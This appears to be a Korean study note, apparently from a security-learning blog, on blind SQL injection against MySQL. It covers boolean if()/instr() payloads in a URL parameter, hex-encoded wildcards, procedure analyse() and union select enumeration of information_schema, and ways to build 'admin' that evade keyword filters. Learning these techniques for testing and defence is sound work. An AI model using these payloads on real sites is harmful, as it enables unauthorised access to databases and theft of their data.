[WEB] blind sql injection

mysql 함수

ascii(), ord()

char()
instr()

locate()
left()
right()

mid()
lpad()
rpad()
concat()
length()
repeat()
reverse()
substr()
replace()

if()

ifnull()

- if -

if(2>1, '참', '거짓')

컬럼명을 사용넣어 blind sql injection~~

 

- instr -

instr('aabb', 'ab') --> 2반환
instr('aabb', 'E') --> 0반환

--->  대소문자 구분안함

 

ex)

?no=if(instr(id,0x30),3,5)

[*] instr(id,0x30)은 모든 레코드에 대해서 수행하고 각 레코드 별로 3, 5의 결과를 출력함.

--- 3, 5는 각각 참,거짓을 판단가능한 값이 되도록한다!

 

- 와일드카드(%) 0x25도 동작 -

memo like '%a%' --> memo like 0x256425

 

ascii()
ord()

instr()
locate()
right, left

 

- procedure analyse()로 칼럼 얻기 -

뒤에 procedure analyse()를 붙인다.

 

- 2번째, 3번째 컬럼 얻을때 ....

from guestbook where 1 limit 0,1 procedure analyse()             //1번째 (x)

from guestbook where num=1 limit 0,1 procedure analyse()      //1번째 (o)   

from guestbook where num=1 limit 1,1 procedure analyse()      //2번째 (o)   

 

- length() + replace() -

특정 문자를 replace로 ('a' -> 'bbb' )처럼 길이를 변경하여 특정 문자 존재 확인

 

-  lpad() + conv() - 

http://hyunmini.tistory.com/49

- union select -

union select group_concat(table_name) from information_schema.tables where table_schema <> 'information_schema'

union select count(table_name) from information_schema.tables where table_schema <> 'information_schema'

union select table_name from information_schema.tables where table_schema=database()

union select column_name from information_schema.columns where table_name='users'

- admin - 

mysql> SELECT LPAD('min','5','ad');

mysql> SELECT REPLACE('admic','c','n');

mysql> SELECT CHAR(97,100,109,105,110);

mysql> SELECT REVERSE('nimda');

mysql> SELECT CONCAT('adm','in');

mysql> SELECT LOWER(CONCAT(CONV(10,10,36),CONV(13,10,36),CONV(22,10,36),CONV(18,10,36),CONV(23,10,36)));

mysql> SELECT CONCAT_WS('','adm','in');

mysql> SELECT 'adm' 'in'

mysql> SELECT 0x61646d696e;

mysql> SELECT INSERT('adm',4, 6, 'in');

mysql> SELECT LTRIM('   admin');

mysql> SELECT RTRIM('admin   ');

mysql> SELECT TRIM('   admin   ');

mysql> SELECT RPAD('ad',5,'min');

mysql> SELECT UNHEX('61646d696e');

ref)

http://wisedier.tistory.com/109

http://websec.wordpress.com/2010/12/